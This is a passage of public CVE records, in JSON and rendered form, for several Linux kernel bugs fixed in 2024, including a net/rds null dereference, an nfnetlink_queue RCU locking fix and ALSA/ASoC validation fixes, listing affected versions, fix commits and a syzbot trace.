"dateUpdated": "2024-08-02T03:21:48.670Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d275de8ea7be3a453629fddae41d4156762e814c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bcd46782e2ec3825d10c1552fcb674d491cc09f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfb786b03b03c5ff38882bee38525eb9987e4d14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d49fac38479bfdaec52b3ea274d290c47a294029"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cbaac2e5488ed54833897264a5ffb2a341a9f196"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92309bed3c5fbe2ccd4c45056efd42edbd06162d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6794090c742008c53b344b35b021d4a3093dc50a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62fc3357e079a07a22465b9b6ef71bb6ea75ee4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d275de8ea7be3a453629fddae41d4156762e814c",
"status": "affected",
"version": "786854141057751bc08eb26f1b02e97c1631c8f4",
"versionType": "git"
},
{
"lessThan": "bcd46782e2ec3825d10c1552fcb674d491cc09f9",
"status": "affected",
"version": "997efea2bf3a4adb96c306b9ad6a91442237bf5b",
"versionType": "git"
},
{
"lessThan": "cfb786b03b03c5ff38882bee38525eb9987e4d14",
"status": "affected",
"version": "9dfc15a10dfd44f8ff7f27488651cb5be6af83c2",
"versionType": "git"
},
{
"lessThan": "d49fac38479bfdaec52b3ea274d290c47a294029",
"status": "affected",
"version": "b562ebe21ed9adcf42242797dd6cb75beef12bf0",
"versionType": "git"
},
{
"lessThan": "cbaac2e5488ed54833897264a5ffb2a341a9f196",
"status": "affected",
"version": "998fd719e6d6468b930ac0c44552ea9ff8b07b80",
"versionType": "git"
},
{
"lessThan": "92309bed3c5fbe2ccd4c45056efd42edbd06162d",
"status": "affected",
"version": "2b505d05280739ce31d5708da840f42df827cb85",
"versionType": "git"
},
{
"lessThan": "6794090c742008c53b344b35b021d4a3093dc50a",
"status": "affected",
"version": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"versionType": "git"
},
{
"lessThan": "62fc3357e079a07a22465b9b6ef71bb6ea75ee4b",
"status": "affected",
"version": "c055fc00c07be1f0df7375ab0036cebd1106ed38",
"versionType": "git"
},
{
"status": "affected",
"version": "907761307469adecb02461a14120e9a1812a5fb1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rds/rdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.19.310",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.272",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.213",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.152",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "6.1.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "6.6.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: fix possible cp null dereference\n\ncp might be null, calling cp-\u003ecp_conn would produce null dereference\n\n[Simon Horman adds:]\n\nAnalysis:\n\n* cp is a parameter of __rds_rdma_map and is not reassigned.\n\n* The following call-sites pass a NULL cp argument to __rds_rdma_map()\n\n - rds_get_mr()\n - rds_get_mr_for_dest\n\n* Prior to the code above, the following assumes that cp may be NULL\n (which is indicative, but could itself be unnecessary)\n\n\ttrans_private = rs-\u003ers_transport-\u003eget_mr(\n\t\tsg, nents, rs, \u0026mr-\u003er_key, cp ? cp-\u003ecp_conn : NULL,\n\t\targs-\u003evec.addr, args-\u003evec.bytes,\n\t\tneed_odp ? ODP_ZEROBASED : ODP_NOT_NEEDED);\n\n* The code modified by this patch is guarded by IS_ERR(trans_private),\n where trans_private is assigned as per the previous point in this analysis.\n\n The only implementation of get_mr that I could locate is rds_ib_get_mr()\n which can return an ERR_PTR if the conn (4th) argument is NULL.\n\n* ret is set to PTR_ERR(trans_private).\n rds_ib_get_mr can return ERR_PTR(-ENODEV) if the conn (4th) argument is NULL.\n Thus ret may be -ENODEV in which case the code in question will execute.\n\nConclusion:\n* cp may be NULL at the point where this patch adds a check;\n this patch does seem to address a possible bug"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:02.708Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d275de8ea7be3a453629fddae41d4156762e814c"
},
{
"url": "https://git.kernel.org/stable/c/bcd46782e2ec3825d10c1552fcb674d491cc09f9"
},
{
"url": "https://git.kernel.org/stable/c/cfb786b03b03c5ff38882bee38525eb9987e4d14"
},
{
"url": "https://git.kernel.org/stable/c/d49fac38479bfdaec52b3ea274d290c47a294029"
},
{
"url": "https://git.kernel.org/stable/c/cbaac2e5488ed54833897264a5ffb2a341a9f196"
},
{
"url": "https://git.kernel.org/stable/c/92309bed3c5fbe2ccd4c45056efd42edbd06162d"
},
{
"url": "https://git.kernel.org/stable/c/6794090c742008c53b344b35b021d4a3093dc50a"
},
{
"url": "https://git.kernel.org/stable/c/62fc3357e079a07a22465b9b6ef71bb6ea75ee4b"
}
],
"title": "net/rds: fix possible cp null dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35902",
"datePublished": "2024-05-19T08:34:55.692Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T12:56:02.708Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36286 (GCVE-0-2024-36286)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()
syzbot reported that nf_reinject() could be called without rcu_read_lock() :
WARNING: suspicious RCU usage
6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted
net/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage!
other info that might help us debug this:
rcu_scheduler_active = 2, debug_locks = 1
2 locks held by syz-executor.4/13427:
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline]
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline]
#0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline]
#1: ffff88801ca92958 (&inst->lock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172
stack backtrace:
CPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024
Call Trace:
<IRQ>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114
lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712
nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline]
nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397
nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline]
instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172
rcu_do_batch kernel/rcu/tree.c:2196 [inline]
rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471
handle_softirqs+0x2d6/0x990 kernel/softirq.c:554
__do_softirq kernel/softirq.c:588 [inline]
invoke_softirq kernel/softirq.c:428 [inline]
__irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637
irq_exit_rcu+0x9/0x30 kernel/softirq.c:649
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline]
sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043
</IRQ>
<TASK>
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 Version: 9872bec773c2e8503fec480c1e8a0c732517e257 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:37:04.735Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36286",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:34.720987Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:45.892Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nfnetlink_queue.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8658bd777cbfcb0c13df23d0ea120e70517761b9",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "3989b817857f4890fab9379221a9d3f52bf5c256",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "e01065b339e323b3dfa1be217fd89e9b3208b0ab",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "25ea5377e3d2921a0f96ae2551f5ab1b36825dd4",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "68f40354a3851df46c27be96b84f11ae193e36c5",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "8f365564af898819a523f1a8cf5c6ce053e9f718",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "215df6490e208bfdd5b3012f5075e7f8736f3e7a",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
},
{
"lessThan": "dc21c6cc3d6986d938efbf95de62473982c98dec",
"status": "affected",
"version": "9872bec773c2e8503fec480c1e8a0c732517e257",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nfnetlink_queue.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.25"
},
{
"lessThan": "2.6.25",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.25",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()\n\nsyzbot reported that nf_reinject() could be called without rcu_read_lock() :\n\nWARNING: suspicious RCU usage\n6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted\n\nnet/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n2 locks held by syz-executor.4/13427:\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline]\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline]\n #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline]\n #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172\n\nstack backtrace:\nCPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nCall Trace:\n \u003cIRQ\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712\n nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline]\n nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397\n nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline]\n instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172\n rcu_do_batch kernel/rcu/tree.c:2196 [inline]\n rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471\n handle_softirqs+0x2d6/0x990 kernel/softirq.c:554\n __do_softirq kernel/softirq.c:588 [inline]\n invoke_softirq kernel/softirq.c:428 [inline]\n __irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:649\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043\n \u003c/IRQ\u003e\n \u003cTASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:03.459Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
},
{
"url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
},
{
"url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
},
{
"url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
},
{
"url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
},
{
"url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
},
{
"url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
},
{
"url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
}
],
"title": "netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36286",
"datePublished": "2024-06-21T10:18:08.364Z",
"dateReserved": "2024-06-21T10:13:16.315Z",
"dateUpdated": "2025-05-04T09:11:03.459Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42074 (GCVE-0-2024-42074)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: amd: acp: add a null check for chip_pdev structure
When acp platform device creation is skipped, chip->chip_pdev value will
remain NULL. Add NULL check for chip->chip_pdev structure in
snd_acp_resume() function to avoid null pointer dereference.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.564Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e158ed266fc1adfa456880fb6dabce2e5623843b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0c39ae1cc86afe74aa2f6273ccb514f8d180cf6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98d919dfee1cc402ca29d45da642852d7c9a2301"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42074",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:33.521458Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:57.712Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/amd/acp/acp-pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e158ed266fc1adfa456880fb6dabce2e5623843b",
"status": "affected",
"version": "088a40980efbc2c449b72f0f2c7ebd82f71d08e2",
"versionType": "git"
},
{
"lessThan": "b0c39ae1cc86afe74aa2f6273ccb514f8d180cf6",
"status": "affected",
"version": "088a40980efbc2c449b72f0f2c7ebd82f71d08e2",
"versionType": "git"
},
{
"lessThan": "98d919dfee1cc402ca29d45da642852d7c9a2301",
"status": "affected",
"version": "088a40980efbc2c449b72f0f2c7ebd82f71d08e2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/amd/acp/acp-pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: amd: acp: add a null check for chip_pdev structure\n\nWhen acp platform device creation is skipped, chip-\u003echip_pdev value will\nremain NULL. Add NULL check for chip-\u003echip_pdev structure in\nsnd_acp_resume() function to avoid null pointer dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:24.009Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e158ed266fc1adfa456880fb6dabce2e5623843b"
},
{
"url": "https://git.kernel.org/stable/c/b0c39ae1cc86afe74aa2f6273ccb514f8d180cf6"
},
{
"url": "https://git.kernel.org/stable/c/98d919dfee1cc402ca29d45da642852d7c9a2301"
}
],
"title": "ASoC: amd: acp: add a null check for chip_pdev structure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42074",
"datePublished": "2024-07-29T15:52:37.333Z",
"dateReserved": "2024-07-29T15:50:41.169Z",
"dateUpdated": "2025-05-04T09:22:24.009Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42097 (GCVE-0-2024-42097)
Vulnerability from cvelistv5
Published
2024-07-29 17:39
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: emux: improve patch ioctl data validation
In load_data(), make the validation of and skipping over the main info
block match that in load_guspatch().
In load_guspatch(), add checking that the specified patch length matches
the actually supplied data, like load_data() already did.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.545Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40d7def67841343c10f8642a41031fecbb248bab"
},
{
"tags": [
"x_transferred"
],
